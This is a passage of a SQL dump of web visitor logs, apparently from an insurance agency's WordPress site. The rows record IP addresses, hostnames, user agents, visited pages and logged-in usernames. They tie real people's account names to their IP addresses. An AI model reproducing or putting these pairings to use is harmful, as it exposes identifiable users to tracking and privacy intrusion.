Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(1648,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457368015','50.108.150.57','50.108.150.57','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(1651,'0b_7b7850b7875d678b9e95f0f35f47dd27','1457368820','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1652,'0b_7b7850b7875d678b9e95f0f35f47dd27','1457368826','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1655,'0b_a4a0b7a0a786622629d725ca0e9f4dba','1457368824','46.229.170.193','46.229.170.193','/','Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0','','',0,'Linux','Firefox 6','','','','','','','','0','0',0),(1658,'0b_8c94198c12a58c6617cf989cc615f45c','1457369357','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(1660,'0b_8c94198c12a58c6617cf989cc615f45c','1457369373','67.81.56.252','ool-435138fc.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(1661,'0b_34a37e953920a5b110d0160797759918','1457370658','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1664,'0b_34a37e953920a5b110d0160797759918','1457370670','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1666,'0b_9e537f855cb91a473861edcc5bf41cde','1457371728','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','0',0),(1669,'0b_9e537f855cb91a473861edcc5bf41cde','1457371771','67.81.56.252','ool-435138fc.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(1670,'0b_3c5956f1253966e39e9db30b49128f5d','1457371788','31.148.219.176','howell.clientshostname.com','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(1673,'0b_3c5956f1253966e39e9db30b49128f5d','1457371790','31.148.219.176','howell.clientshostname.com','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(1676,'0b_2a80577a872225e90b6d3c5aad801a1c','1457372294','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1678,'0b_2a80577a872225e90b6d3c5aad801a1c','1457372295','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1679,'0b_2a80577a872225e90b6d3c5aad801a1c','1457372298','75.99.148.62','ool-4b63943e.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1682,'0b_2a80577a872225e90b6d3c5aad801a1c','1457372309','75.99.148.62','ool-4b63943e.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','joel10950','','0','51',0),(1684,'0b_5657557185156f633af66e5caf4af9ba','1457373103','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(1685,'0b_9a99807b10dfd2b3e4d06967d53c4cbb','1457373319','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(1687,'0b_9a99807b10dfd2b3e4d06967d53c4cbb','1457373535','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(1690,'0b_e58c11fb909c53dd93083826630b7a8d','1457373647','47.23.188.194','ool-2f17bcc2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(1693,'0b_e58c11fb909c53dd93083826630b7a8d','1457373650','47.23.188.194','ool-2f17bcc2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1694,'0b_c01616d3328f2799e9ea37f123fe5cd6','1457374909','100.43.81.152','spider-100-43-81-152.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(1697,'0b_92be73aafa5b6953b53ac25e58fc6caf','1457374912','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(1699,'0b_89e305d3205fb3d96ad12841da7443a2','1457376395','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1700,'0b_89e305d3205fb3d96ad12841da7443a2','1457376396','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1702,'0b_89e305d3205fb3d96ad12841da7443a2','1457376403','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(1705,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457377225','50.108.150.57','50.108.150.57','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(1706,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457377237','50.108.150.57','50.108.150.57','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(1709,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457377250','50.108.150.57','50.108.150.57','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(1712,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457377265','50.108.150.57','50.108.150.57','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(1714,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457377293','50.108.150.57','50.108.150.57','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/licensing-contracting/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(1717,'0b_3eeac8161c43489b6c6d9d1030b43d67','1457377302','50.108.150.57','50.108.150.57','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(1718,'0b_d7ea48a047f16a40ab6a00ad9fbf8b8d','1457378027','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1720,'0b_3a7b6235da643f1f1f8b638c1ab124fd','1457378125','54.193.98.147','ec2-54-193-98-147.us-west-1.compute.amazonaws.com','/app','python-requests/2.6.0 CPython/2.7.6 Linux/3.13.0-74-generic','','',0,'Linux','','','','','python','','','','0','0',0),(1723,'0b_3a7b6235da643f1f1f8b638c1ab124fd','1457378128','54.193.98.147','ec2-54-193-98-147.us-west-1.compute.amazonaws.com','/','python-requests/2.6.0 CPython/2.7.6 Linux/3.13.0-74-generic','','',0,'Linux','','','','','python','','','','0','0',0),(1724,'0b_aa19e0b3950d3807865358e3f105c427','1457378408','38.88.200.218','38.88.200.218','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(1726,'0b_aa19e0b3950d3807865358e3f105c427','1457378419','38.88.200.218','38.88.200.218','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1729,'0b_bde1ee96cc2fa81a8b7b0be266ad0c88','1457378949','86.106.18.242','242-ST-WIND-2','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7','Firefox 15','us','','','','','','','0','0',0),(1730,'0b_feee647a7e17a704afc017cd7cf7ddcf','1457379219','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(1733,'0b_feee647a7e17a704afc017cd7cf7ddcf','1457379220','208.125.14.78','rrcs-208-125-14-78.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','abrahammermelstein','','0','0',0),(1735,'0b_ffc43850b0f0e283370e2eeeb932bdb2','1457379565','66.249.75.96','crawl-66-249-75-96.googlebot.com','/members/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(1738,'0b_13a7e4302669a98485e3831b9dc6a169','1457380723','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(1739,'0b_13a7e4302669a98485e3831b9dc6a169','1457380724','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(1741,'0b_d32b6414a398f4a4aa46c751e2e78247','1457380785','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1744,'0b_d32b6414a398f4a4aa46c751e2e78247','1457380787','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1745,'0b_d32b6414a398f4a4aa46c751e2e78247','1457380798','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(1748,'0b_b18d8563b84263951c9bf017701ce1c9','1457381810','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1751,'0b_b18d8563b84263951c9bf017701ce1c9','1457381812','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1754,'0b_f6df96cef1941d9574d159cb20e68345','1457381965','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1756,'0b_f18b8d5595fdf418e5c59f26b19a6f42','1457383239','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1757,'0b_f18b8d5595fdf418e5c59f26b19a6f42','1457383241','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1760,'0b_5657557185156f633af66e5caf4af9ba','1457383509','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(1763,'0b_5657557185156f633af66e5caf4af9ba','1457383512','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(1765,'0b_5657557185156f633af66e5caf4af9ba','1457383515','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(1766,'0b_5657557185156f633af66e5caf4af9ba','1457383520','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(1769,'0b_3ccd12cd888218d404fb0baa0aa55e9a','1457383761','155.188.123.20','155.188.123.20','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0','https://www.google.com','_notprovided_',1,'Win7 x64','Firefox 38','us','','www.google.com','','','','','0','0',0),(1771,'0b_67cd4146bb4edb3975789aec58e91531','1457383789','155.188.183.23','155.188.183.23','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 38','us','1920 x 1080','','','','','','0','0',0),(1772,'0b_67cd4146bb4edb3975789aec58e91531','1457383806','155.188.183.23','155.188.183.23','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 38','us','1920 x 1080','','','','','','0','0',0),(1775,'0b_67cd4146bb4edb3975789aec58e91531','1457383824','155.188.183.23','155.188.183.23','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0','http://www.empireins.com/about-us/','',0,'Win7 x64','Firefox 38','us','1920 x 1080','','','','','','0','51',0),(1778,'0b_bc6f9817722a6d35260141e351ee7dae','1457384165','208.115.111.66','208-115-111-66-reverse.wowrack.com','/igo/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(1780,'0b_bf04517294098521979329a34d55def8','1457384191','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(1783,'0b_bf04517294098521979329a34d55def8','1457384192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(1784,'0b_907adebcb0b9e2cf7e4e5ab24e6b56be','1457384391','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1787,'0b_907adebcb0b9e2cf7e4e5ab24e6b56be','1457384392','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(1790,'0b_cf52dee0e79a783a25b81ec581a12412','1457384808','70.169.9.112','wsip-70-169-9-112.hr.hr.cox.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 48','us','','Google','','','','','0','0',0),(1792,'0b_cf52dee0e79a783a25b81ec581a12412','1457384811','70.169.9.112','wsip-70-169-9-112.hr.hr.cox.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','','','','','','','0','0',0),(1795,'0b_67f486ad3b17603310c143e3af4b04a3','1457384897','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1796,'0b_67f486ad3b17603310c143e3af4b04a3','1457384901','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(1798,'0b_5ef08684c0874f829f33c8f65f199bdc','1457388520','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1799,'0b_f18b8d5595fdf418e5c59f26b19a6f42','1457389638','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1801,'0b_f18b8d5595fdf418e5c59f26b19a6f42','1457389639','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(1802,'0b_bf04517294098521979329a34d55def8','1457389651','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(1804,'0b_bf04517294098521979329a34d55def8','1457389653','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(1805,'0b_2d86a1b60d248b27ec85a4123e33b472','1457390885','38.122.67.250','38.122.67.250','/','Java/1.8.0_71','','',0,'','','','','','Java','','','','0','0',0),(1808,'0b_b270061ff2fc0f5230a569df087639f8','1457391755','66.249.75.102','crawl-66-249-75-102.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(1810,'0b_bd0ac1a717040cf6dbb8657f92dfa06f','1457391757','66.249.75.96','crawl-66-249-75-96.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(1813,'0b_b270061ff2fc0f5230a569df087639f8','1457393125','66.249.75.102','crawl-66-249-75-102.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(1816,'0b_7948185329bf82929a32052ddbb57609','1457398863','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(1817,'0b_e9a6b547c7ed1853a01ac7ea976b1511','1457400585','54.172.209.33','ec2-54-172-209-33.compute-1.amazonaws.com','/robots.txt','btcrawler','','',0,'','','','','','Unknown Spider','','','','0','0',0),(1820,'0b_e9a6b547c7ed1853a01ac7ea976b1511','1457400586','54.172.209.33','ec2-54-172-209-33.compute-1.amazonaws.com','/','btcrawler','','',0,'','','us','','','','','','','0','0',0),(1822,'0b_cca6d899b37ce4c85e28f2a725ba612f','1457402950','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(1825,'0b_cca6d899b37ce4c85e28f2a725ba612f','1457402951','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1826,'0b_1866f8a4051c3bf2200993bf9ef34f3b','1457402968','40.77.167.45','msnbot-40-77-167-45.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(1829,'0b_cca6d899b37ce4c85e28f2a725ba612f','1457402974','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(1832,'0b_737a36754cadc960e20b4e811b0432ab','1457404587','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(1835,'0b_737a36754cadc960e20b4e811b0432ab','1457404588','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(1838,'0b_737a36754cadc960e20b4e811b0432ab','1457404612','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','','','0','0',0),(1840,'0b_737a36754cadc960e20b4e811b0432ab','1457404631','96.250.55.170','static-96-250-55-170.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like 